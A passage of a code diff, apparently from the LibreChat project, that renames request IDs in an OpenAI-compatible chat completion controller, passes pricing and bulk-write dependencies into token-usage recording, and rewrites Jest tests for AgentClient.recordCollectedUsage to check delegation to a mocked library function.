const agentInDb = await Agent.findOne({ id: existingAgentId });
|
||||||
|
expect(agentInDb.tools).toContain(`validTool${d}authorizedServer`);
|
||||||
|
expect(agentInDb.tools).toContain(`otherTool${d}anotherServer`);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -25,6 +25,7 @@ const { loadAgentTools, loadToolsForExecution } = require('~/server/services/Too
|
||||||
const { createToolEndCallback } = require('~/server/controllers/agents/callbacks');
|
const { createToolEndCallback } = require('~/server/controllers/agents/callbacks');
|
||||||
const { findAccessibleResources } = require('~/server/services/PermissionService');
|
const { findAccessibleResources } = require('~/server/services/PermissionService');
|
||||||
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
|
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
|
||||||
|
const { getMultiplier, getCacheMultiplier } = require('~/models/tx');
|
||||||
const { getConvoFiles } = require('~/models/Conversation');
|
const { getConvoFiles } = require('~/models/Conversation');
|
||||||
const { getAgent, getAgents } = require('~/models/Agent');
|
const { getAgent, getAgents } = require('~/models/Agent');
|
||||||
const db = require('~/models');
|
const db = require('~/models');
|
||||||
|
|
@ -129,7 +130,6 @@ const OpenAIChatCompletionController = async (req, res) => {
|
||||||
const appConfig = req.config;
|
const appConfig = req.config;
|
||||||
const requestStartTime = Date.now();
|
const requestStartTime = Date.now();
|
||||||
|
|
||||||
// Validate request
|
|
||||||
const validation = validateRequest(req.body);
|
const validation = validateRequest(req.body);
|
||||||
if (isChatCompletionValidationFailure(validation)) {
|
if (isChatCompletionValidationFailure(validation)) {
|
||||||
return sendErrorResponse(res, 400, validation.error);
|
return sendErrorResponse(res, 400, validation.error);
|
||||||
|
|
@ -150,20 +150,20 @@ const OpenAIChatCompletionController = async (req, res) => {
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
// Generate IDs
|
const responseId = `chatcmpl-${nanoid()}`;
|
||||||
const requestId = `chatcmpl-${nanoid()}`;
|
|
||||||
const conversationId = request.conversation_id ?? nanoid();
|
const conversationId = request.conversation_id ?? nanoid();
|
||||||
const parentMessageId = request.parent_message_id ?? null;
|
const parentMessageId = request.parent_message_id ?? null;
|
||||||
const created = Math.floor(Date.now() / 1000);
|
const created = Math.floor(Date.now() / 1000);
|
||||||
|
|
||||||
|
/** @type {import('@librechat/api').OpenAIResponseContext} — key must be `requestId` to match the type used by createChunk/buildNonStreamingResponse */
|
||||||
const context = {
|
const context = {
|
||||||
created,
|
created,
|
||||||
requestId,
|
requestId: responseId,
|
||||||
model: agentId,
|
model: agentId,
|
||||||
};
|
};
|
||||||
|
|
||||||
logger.debug(
|
logger.debug(
|
||||||
`[OpenAI API] Request ${requestId} started for agent ${agentId}, stream: ${request.stream}`,
|
`[OpenAI API] Response ${responseId} started for agent ${agentId}, stream: ${request.stream}`,
|
||||||
);
|
);
|
||||||
|
|
||||||
// Set up abort controller
|
// Set up abort controller
|
||||||
|
|
@ -265,6 +265,7 @@ const OpenAIChatCompletionController = async (req, res) => {
|
||||||
toolRegistry: primaryConfig.toolRegistry,
|
toolRegistry: primaryConfig.toolRegistry,
|
||||||
userMCPAuthMap: primaryConfig.userMCPAuthMap,
|
userMCPAuthMap: primaryConfig.userMCPAuthMap,
|
||||||
tool_resources: primaryConfig.tool_resources,
|
tool_resources: primaryConfig.tool_resources,
|
||||||
|
actionsEnabled: primaryConfig.actionsEnabled,
|
||||||
});
|
});
|
||||||
},
|
},
|
||||||
toolEndCallback,
|
toolEndCallback,
|
||||||
|
|
@ -450,11 +451,11 @@ const OpenAIChatCompletionController = async (req, res) => {
|
||||||
agents: [primaryConfig],
|
agents: [primaryConfig],
|
||||||
messages: formattedMessages,
|
messages: formattedMessages,
|
||||||
indexTokenCountMap,
|
indexTokenCountMap,
|
||||||
runId: requestId,
|
runId: responseId,
|
||||||
signal: abortController.signal,
|
signal: abortController.signal,
|
||||||
customHandlers: handlers,
|
customHandlers: handlers,
|
||||||
requestBody: {
|
requestBody: {
|
||||||
messageId: requestId,
|
messageId: responseId,
|
||||||
conversationId,
|
conversationId,
|
||||||
},
|
},
|
||||||
user: { id: userId },
|
user: { id: userId },
|
||||||
|
|
@ -471,6 +472,10 @@ const OpenAIChatCompletionController = async (req, res) => {
|
||||||
thread_id: conversationId,
|
thread_id: conversationId,
|
||||||
user_id: userId,
|
user_id: userId,
|
||||||
user: createSafeUser(req.user),
|
user: createSafeUser(req.user),
|
||||||
|
requestBody: {
|
||||||
|
messageId: responseId,
|
||||||
|
conversationId,
|
||||||
|
},
|
||||||
...(userMCPAuthMap != null && { userMCPAuthMap }),
|
...(userMCPAuthMap != null && { userMCPAuthMap }),
|
||||||
},
|
},
|
||||||
signal: abortController.signal,
|
signal: abortController.signal,
|
||||||
|
|
@ -490,12 +495,18 @@ const OpenAIChatCompletionController = async (req, res) => {
|
||||||
const balanceConfig = getBalanceConfig(appConfig);
|
const balanceConfig = getBalanceConfig(appConfig);
|
||||||
const transactionsConfig = getTransactionsConfig(appConfig);
|
const transactionsConfig = getTransactionsConfig(appConfig);
|
||||||
recordCollectedUsage(
|
recordCollectedUsage(
|
||||||
{ spendTokens, spendStructuredTokens },
|
{
|
||||||
|
spendTokens,
|
||||||
|
spendStructuredTokens,
|
||||||
|
pricing: { getMultiplier, getCacheMultiplier },
|
||||||
|
bulkWriteOps: { insertMany: db.bulkInsertTransactions, updateBalance: db.updateBalance },
|
||||||
|
},
|
||||||
{
|
{
|
||||||
user: userId,
|
user: userId,
|
||||||
conversationId,
|
conversationId,
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
context: 'message',
|
context: 'message',
|
||||||
|
messageId: responseId,
|
||||||
balance: balanceConfig,
|
balance: balanceConfig,
|
||||||
transactions: transactionsConfig,
|
transactions: transactionsConfig,
|
||||||
model: primaryConfig.model || agent.model_parameters?.model,
|
model: primaryConfig.model || agent.model_parameters?.model,
|
||||||
|
|
@ -509,7 +520,7 @@ const OpenAIChatCompletionController = async (req, res) => {
|
||||||
if (isStreaming) {
|
if (isStreaming) {
|
||||||
sendFinalChunk(handlerConfig);
|
sendFinalChunk(handlerConfig);
|
||||||
res.end();
|
res.end();
|
||||||
logger.debug(`[OpenAI API] Request ${requestId} completed in ${duration}ms (streaming)`);
|
logger.debug(`[OpenAI API] Response ${responseId} completed in ${duration}ms (streaming)`);
|
||||||
|
|
||||||
// Wait for artifact processing after response ends (non-blocking)
|
// Wait for artifact processing after response ends (non-blocking)
|
||||||
if (artifactPromises.length > 0) {
|
if (artifactPromises.length > 0) {
|
||||||
|
|
@ -548,7 +559,9 @@ const OpenAIChatCompletionController = async (req, res) => {
|
||||||
usage,
|
usage,
|
||||||
);
|
);
|
||||||
res.json(response);
|
res.json(response);
|
||||||
logger.debug(`[OpenAI API] Request ${requestId} completed in ${duration}ms (non-streaming)`);
|
logger.debug(
|
||||||
|
`[OpenAI API] Response ${responseId} completed in ${duration}ms (non-streaming)`,
|
||||||
|
);
|
||||||
}
|
}
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
const errorMessage = error instanceof Error ? error.message : 'An error occurred';
|
const errorMessage = error instanceof Error ? error.message : 'An error occurred';
|
||||||
|
|
|
||||||
|
|
@ -2,23 +2,37 @@
|
||||||
* Tests for AgentClient.recordCollectedUsage
|
* Tests for AgentClient.recordCollectedUsage
|
||||||
*
|
*
|
||||||
* This is a critical function that handles token spending for agent LLM calls.
|
* This is a critical function that handles token spending for agent LLM calls.
|
||||||
* It must correctly handle:
|
* The client now delegates to the TS recordCollectedUsage from @librechat/api,
|
||||||
* - Sequential execution (single agent with tool calls)
|
* passing pricing and bulkWriteOps deps.
|
||||||
* - Parallel execution (multiple agents with independent inputs)
|
|
||||||
* - Cache token handling (OpenAI and Anthropic formats)
|
|
||||||
*/
|
*/
|
||||||
|
|
||||||
const { EModelEndpoint } = require('librechat-data-provider');
|
const { EModelEndpoint } = require('librechat-data-provider');
|
||||||
|
|
||||||
// Mock dependencies before requiring the module
|
|
||||||
const mockSpendTokens = jest.fn().mockResolvedValue();
|
const mockSpendTokens = jest.fn().mockResolvedValue();
|
||||||
const mockSpendStructuredTokens = jest.fn().mockResolvedValue();
|
const mockSpendStructuredTokens = jest.fn().mockResolvedValue();
|
||||||
|
const mockGetMultiplier = jest.fn().mockReturnValue(1);
|
||||||
|
const mockGetCacheMultiplier = jest.fn().mockReturnValue(null);
|
||||||
|
const mockUpdateBalance = jest.fn().mockResolvedValue({});
|
||||||
|
const mockBulkInsertTransactions = jest.fn().mockResolvedValue(undefined);
|
||||||
|
const mockRecordCollectedUsage = jest
|
||||||
|
.fn()
|
||||||
|
.mockResolvedValue({ input_tokens: 100, output_tokens: 50 });
|
||||||
|
|
||||||
jest.mock('~/models/spendTokens', () => ({
|
jest.mock('~/models/spendTokens', () => ({
|
||||||
spendTokens: (...args) => mockSpendTokens(...args),
|
spendTokens: (...args) => mockSpendTokens(...args),
|
||||||
spendStructuredTokens: (...args) => mockSpendStructuredTokens(...args),
|
spendStructuredTokens: (...args) => mockSpendStructuredTokens(...args),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/tx', () => ({
|
||||||
|
getMultiplier: mockGetMultiplier,
|
||||||
|
getCacheMultiplier: mockGetCacheMultiplier,
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models', () => ({
|
||||||
|
updateBalance: mockUpdateBalance,
|
||||||
|
bulkInsertTransactions: mockBulkInsertTransactions,
|
||||||
|
}));
|
||||||
|
|
||||||
jest.mock('~/config', () => ({
|
jest.mock('~/config', () => ({
|
||||||
logger: {
|
logger: {
|
||||||
debug: jest.fn(),
|
debug: jest.fn(),
|
||||||
|
|
@ -39,6 +53,14 @@ jest.mock('@librechat/agents', () => ({
|
||||||
}),
|
}),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
|
jest.mock('@librechat/api', () => {
|
||||||
|
const actual = jest.requireActual('@librechat/api');
|
||||||
|
return {
|
||||||
|
...actual,
|
||||||
|
recordCollectedUsage: (...args) => mockRecordCollectedUsage(...args),
|
||||||
|
};
|
||||||
|
});
|
||||||
|
|
||||||
const AgentClient = require('./client');
|
const AgentClient = require('./client');
|
||||||
|
|
||||||
describe('AgentClient - recordCollectedUsage', () => {
|
describe('AgentClient - recordCollectedUsage', () => {
|
||||||
|
|
@ -74,31 +96,66 @@ describe('AgentClient - recordCollectedUsage', () => {
|
||||||
});
|
});
|
||||||
|
|
||||||
describe('basic functionality', () => {
|
describe('basic functionality', () => {
|
||||||
it('should return early if collectedUsage is empty', async () => {
|
it('should delegate to recordCollectedUsage with full deps', async () => {
|
||||||
|
const collectedUsage = [{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' }];
|
||||||
|
|
||||||
|
await client.recordCollectedUsage({
|
||||||
|
collectedUsage,
|
||||||
|
balance: { enabled: true },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
|
const [deps, params] = mockRecordCollectedUsage.mock.calls[0];
|
||||||
|
|
||||||
|
expect(deps).toHaveProperty('spendTokens');
|
||||||
|
expect(deps).toHaveProperty('spendStructuredTokens');
|
||||||
|
expect(deps).toHaveProperty('pricing');
|
||||||
|
expect(deps.pricing).toHaveProperty('getMultiplier');
|
||||||
|
expect(deps.pricing).toHaveProperty('getCacheMultiplier');
|
||||||
|
expect(deps).toHaveProperty('bulkWriteOps');
|
||||||
|
expect(deps.bulkWriteOps).toHaveProperty('insertMany');
|
||||||
|
expect(deps.bulkWriteOps).toHaveProperty('updateBalance');
|
||||||
|
|
||||||
|
expect(params).toEqual(
|
||||||
|
expect.objectContaining({
|
||||||
|
user: 'user-123',
|
||||||
|
conversationId: 'convo-123',
|
||||||
|
collectedUsage,
|
||||||
|
context: 'message',
|
||||||
|
balance: { enabled: true },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
}),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should not set this.usage if collectedUsage is empty (returns undefined)', async () => {
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue(undefined);
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
collectedUsage: [],
|
collectedUsage: [],
|
||||||
balance: { enabled: true },
|
balance: { enabled: true },
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).not.toHaveBeenCalled();
|
|
||||||
expect(mockSpendStructuredTokens).not.toHaveBeenCalled();
|
|
||||||
expect(client.usage).toBeUndefined();
|
expect(client.usage).toBeUndefined();
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should return early if collectedUsage is null', async () => {
|
it('should not set this.usage if collectedUsage is null (returns undefined)', async () => {
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue(undefined);
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
collectedUsage: null,
|
collectedUsage: null,
|
||||||
balance: { enabled: true },
|
balance: { enabled: true },
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).not.toHaveBeenCalled();
|
|
||||||
expect(client.usage).toBeUndefined();
|
expect(client.usage).toBeUndefined();
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should handle single usage entry correctly', async () => {
|
it('should set this.usage from recordCollectedUsage result', async () => {
|
||||||
const collectedUsage = [{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' }];
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 200, output_tokens: 75 });
|
||||||
|
const collectedUsage = [{ input_tokens: 200, output_tokens: 75, model: 'gpt-4' }];
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
|
|
@ -106,521 +163,122 @@ describe('AgentClient - recordCollectedUsage', () => {
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(1);
|
expect(client.usage).toEqual({ input_tokens: 200, output_tokens: 75 });
|
||||||
expect(mockSpendTokens).toHaveBeenCalledWith(
|
|
||||||
expect.objectContaining({
|
|
||||||
conversationId: 'convo-123',
|
|
||||||
user: 'user-123',
|
|
||||||
model: 'gpt-4',
|
|
||||||
}),
|
|
||||||
{ promptTokens: 100, completionTokens: 50 },
|
|
||||||
);
|
|
||||||
expect(client.usage.input_tokens).toBe(100);
|
|
||||||
expect(client.usage.output_tokens).toBe(50);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should skip null entries in collectedUsage', async () => {
|
|
||||||
const collectedUsage = [
|
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
|
||||||
null,
|
|
||||||
{ input_tokens: 200, output_tokens: 60, model: 'gpt-4' },
|
|
||||||
];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(2);
|
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
describe('sequential execution (single agent with tool calls)', () => {
|
describe('sequential execution (single agent with tool calls)', () => {
|
||||||
it('should calculate tokens correctly for sequential tool calls', async () => {
|
it('should pass all usage entries to recordCollectedUsage', async () => {
|
||||||
// Sequential flow: output of call N becomes part of input for call N+1
|
|
||||||
// Call 1: input=100, output=50
|
|
||||||
// Call 2: input=150 (100+50), output=30
|
|
||||||
// Call 3: input=180 (150+30), output=20
|
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
||||||
{ input_tokens: 150, output_tokens: 30, model: 'gpt-4' },
|
{ input_tokens: 150, output_tokens: 30, model: 'gpt-4' },
|
||||||
{ input_tokens: 180, output_tokens: 20, model: 'gpt-4' },
|
{ input_tokens: 180, output_tokens: 20, model: 'gpt-4' },
|
||||||
];
|
];
|
||||||
|
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 100, output_tokens: 100 });
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
balance: { enabled: true },
|
balance: { enabled: true },
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(3);
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
// Total output should be sum of all output_tokens: 50 + 30 + 20 = 100
|
const [, params] = mockRecordCollectedUsage.mock.calls[0];
|
||||||
|
expect(params.collectedUsage).toHaveLength(3);
|
||||||
expect(client.usage.output_tokens).toBe(100);
|
expect(client.usage.output_tokens).toBe(100);
|
||||||
expect(client.usage.input_tokens).toBe(100); // First entry's input
|
expect(client.usage.input_tokens).toBe(100);
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
describe('parallel execution (multiple agents)', () => {
|
describe('parallel execution (multiple agents)', () => {
|
||||||
it('should handle parallel agents with independent input tokens', async () => {
|
it('should pass parallel agent usage to recordCollectedUsage', async () => {
|
||||||
// Parallel agents have INDEPENDENT input tokens (not cumulative)
|
|
||||||
// Agent A: input=100, output=50
|
|
||||||
// Agent B: input=80, output=40 (different context, not 100+50)
|
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
||||||
{ input_tokens: 80, output_tokens: 40, model: 'gpt-4' },
|
{ input_tokens: 80, output_tokens: 40, model: 'gpt-4' },
|
||||||
];
|
];
|
||||||
|
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 100, output_tokens: 90 });
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
balance: { enabled: true },
|
balance: { enabled: true },
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(2);
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
// Expected total output: 50 + 40 = 90
|
expect(client.usage.output_tokens).toBe(90);
|
||||||
// output_tokens must be positive and should reflect total output
|
|
||||||
expect(client.usage.output_tokens).toBeGreaterThan(0);
|
expect(client.usage.output_tokens).toBeGreaterThan(0);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should NOT produce negative output_tokens for parallel execution', async () => {
|
/** Bug regression: parallel agents where second agent has LOWER input tokens produced negative output via incremental calculation. */
|
||||||
// Critical bug scenario: parallel agents where second agent has LOWER input tokens
|
it('should NOT produce negative output_tokens', async () => {
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
{ input_tokens: 200, output_tokens: 100, model: 'gpt-4' },
|
{ input_tokens: 200, output_tokens: 100, model: 'gpt-4' },
|
||||||
{ input_tokens: 50, output_tokens: 30, model: 'gpt-4' },
|
{ input_tokens: 50, output_tokens: 30, model: 'gpt-4' },
|
||||||
];
|
];
|
||||||
|
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 200, output_tokens: 130 });
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
balance: { enabled: true },
|
balance: { enabled: true },
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
// output_tokens MUST be positive for proper token tracking
|
|
||||||
expect(client.usage.output_tokens).toBeGreaterThan(0);
|
expect(client.usage.output_tokens).toBeGreaterThan(0);
|
||||||
// Correct value should be 100 + 30 = 130
|
expect(client.usage.output_tokens).toBe(130);
|
||||||
});
|
|
||||||
|
|
||||||
it('should calculate correct total output for parallel agents', async () => {
|
|
||||||
// Three parallel agents with independent contexts
|
|
||||||
const collectedUsage = [
|
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
|
||||||
{ input_tokens: 120, output_tokens: 60, model: 'gpt-4-turbo' },
|
|
||||||
{ input_tokens: 80, output_tokens: 40, model: 'claude-3' },
|
|
||||||
];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(3);
|
|
||||||
// Total output should be 50 + 60 + 40 = 150
|
|
||||||
expect(client.usage.output_tokens).toBe(150);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should handle worst-case parallel scenario without negative tokens', async () => {
|
|
||||||
// Extreme case: first agent has very high input, subsequent have low
|
|
||||||
const collectedUsage = [
|
|
||||||
{ input_tokens: 1000, output_tokens: 500, model: 'gpt-4' },
|
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
|
||||||
{ input_tokens: 50, output_tokens: 25, model: 'gpt-4' },
|
|
||||||
];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
// Must be positive, should be 500 + 50 + 25 = 575
|
|
||||||
expect(client.usage.output_tokens).toBeGreaterThan(0);
|
|
||||||
expect(client.usage.output_tokens).toBe(575);
|
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
describe('real-world scenarios', () => {
|
describe('real-world scenarios', () => {
|
||||||
it('should correctly sum output tokens for sequential tool calls with growing context', async () => {
|
it('should correctly handle sequential tool calls with growing context', async () => {
|
||||||
// Real production data: Claude Opus with multiple tool calls
|
|
||||||
// Context grows as tool results are added, but output_tokens should only count model generations
|
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
{
|
{ input_tokens: 31596, output_tokens: 151, model: 'claude-opus-4-5-20251101' },
|
||||||
input_tokens: 31596,
|
{ input_tokens: 35368, output_tokens: 150, model: 'claude-opus-4-5-20251101' },
|
||||||
output_tokens: 151,
|
{ input_tokens: 58362, output_tokens: 295, model: 'claude-opus-4-5-20251101' },
|
||||||
total_tokens: 31747,
|
{ input_tokens: 112604, output_tokens: 193, model: 'claude-opus-4-5-20251101' },
|
||||||
input_token_details: { cache_read: 0, cache_creation: 0 },
|
{ input_tokens: 257440, output_tokens: 2217, model: 'claude-opus-4-5-20251101' },
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 35368,
|
|
||||||
output_tokens: 150,
|
|
||||||
total_tokens: 35518,
|
|
||||||
input_token_details: { cache_read: 0, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 58362,
|
|
||||||
output_tokens: 295,
|
|
||||||
total_tokens: 58657,
|
|
||||||
input_token_details: { cache_read: 0, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 112604,
|
|
||||||
output_tokens: 193,
|
|
||||||
total_tokens: 112797,
|
|
||||||
input_token_details: { cache_read: 0, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 257440,
|
|
||||||
output_tokens: 2217,
|
|
||||||
total_tokens: 259657,
|
|
||||||
input_token_details: { cache_read: 0, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
];
|
];
|
||||||
|
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 31596, output_tokens: 3006 });
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
balance: { enabled: true },
|
balance: { enabled: true },
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
// input_tokens should be first entry's input (initial context)
|
|
||||||
expect(client.usage.input_tokens).toBe(31596);
|
expect(client.usage.input_tokens).toBe(31596);
|
||||||
|
|
||||||
// output_tokens should be sum of all model outputs: 151 + 150 + 295 + 193 + 2217 = 3006
|
|
||||||
// NOT the inflated value from incremental calculation (338,559)
|
|
||||||
expect(client.usage.output_tokens).toBe(3006);
|
expect(client.usage.output_tokens).toBe(3006);
|
||||||
|
|
||||||
// Verify spendTokens was called for each entry with correct values
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(5);
|
|
||||||
expect(mockSpendTokens).toHaveBeenNthCalledWith(
|
|
||||||
1,
|
|
||||||
expect.objectContaining({ model: 'claude-opus-4-5-20251101' }),
|
|
||||||
{ promptTokens: 31596, completionTokens: 151 },
|
|
||||||
);
|
|
||||||
expect(mockSpendTokens).toHaveBeenNthCalledWith(
|
|
||||||
5,
|
|
||||||
expect.objectContaining({ model: 'claude-opus-4-5-20251101' }),
|
|
||||||
{ promptTokens: 257440, completionTokens: 2217 },
|
|
||||||
);
|
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should handle single followup message correctly', async () => {
|
it('should correctly handle cache tokens', async () => {
|
||||||
// Real production data: followup to the above conversation
|
|
||||||
const collectedUsage = [
|
|
||||||
{
|
|
||||||
input_tokens: 263406,
|
|
||||||
output_tokens: 257,
|
|
||||||
total_tokens: 263663,
|
|
||||||
input_token_details: { cache_read: 0, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(client.usage.input_tokens).toBe(263406);
|
|
||||||
expect(client.usage.output_tokens).toBe(257);
|
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(1);
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledWith(
|
|
||||||
expect.objectContaining({ model: 'claude-opus-4-5-20251101' }),
|
|
||||||
{ promptTokens: 263406, completionTokens: 257 },
|
|
||||||
);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should ensure output_tokens > 0 check passes for BaseClient.sendMessage', async () => {
|
|
||||||
// This verifies the fix for the duplicate token spending bug
|
|
||||||
// BaseClient.sendMessage checks: if (usage != null && Number(usage[this.outputTokensKey]) > 0)
|
|
||||||
const collectedUsage = [
|
|
||||||
{
|
|
||||||
input_tokens: 31596,
|
|
||||||
output_tokens: 151,
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 35368,
|
|
||||||
output_tokens: 150,
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
const usage = client.getStreamUsage();
|
|
||||||
|
|
||||||
// The check that was failing before the fix
|
|
||||||
expect(usage).not.toBeNull();
|
|
||||||
expect(Number(usage.output_tokens)).toBeGreaterThan(0);
|
|
||||||
|
|
||||||
// Verify correct value
|
|
||||||
expect(usage.output_tokens).toBe(301); // 151 + 150
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should correctly handle cache tokens with multiple tool calls', async () => {
|
|
||||||
// Real production data: Claude Opus with cache tokens (prompt caching)
|
|
||||||
// First entry has cache_creation, subsequent entries have cache_read
|
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
{
|
{
|
||||||
input_tokens: 788,
|
input_tokens: 788,
|
||||||
output_tokens: 163,
|
output_tokens: 163,
|
||||||
total_tokens: 951,
|
|
||||||
input_token_details: { cache_read: 0, cache_creation: 30808 },
|
input_token_details: { cache_read: 0, cache_creation: 30808 },
|
||||||
model: 'claude-opus-4-5-20251101',
|
model: 'claude-opus-4-5-20251101',
|
||||||
},
|
},
|
||||||
{
|
|
||||||
input_tokens: 3802,
|
|
||||||
output_tokens: 149,
|
|
||||||
total_tokens: 3951,
|
|
||||||
input_token_details: { cache_read: 30808, cache_creation: 768 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 26808,
|
|
||||||
output_tokens: 225,
|
|
||||||
total_tokens: 27033,
|
|
||||||
input_token_details: { cache_read: 31576, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 80912,
|
|
||||||
output_tokens: 204,
|
|
||||||
total_tokens: 81116,
|
|
||||||
input_token_details: { cache_read: 31576, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 136454,
|
|
||||||
output_tokens: 206,
|
|
||||||
total_tokens: 136660,
|
|
||||||
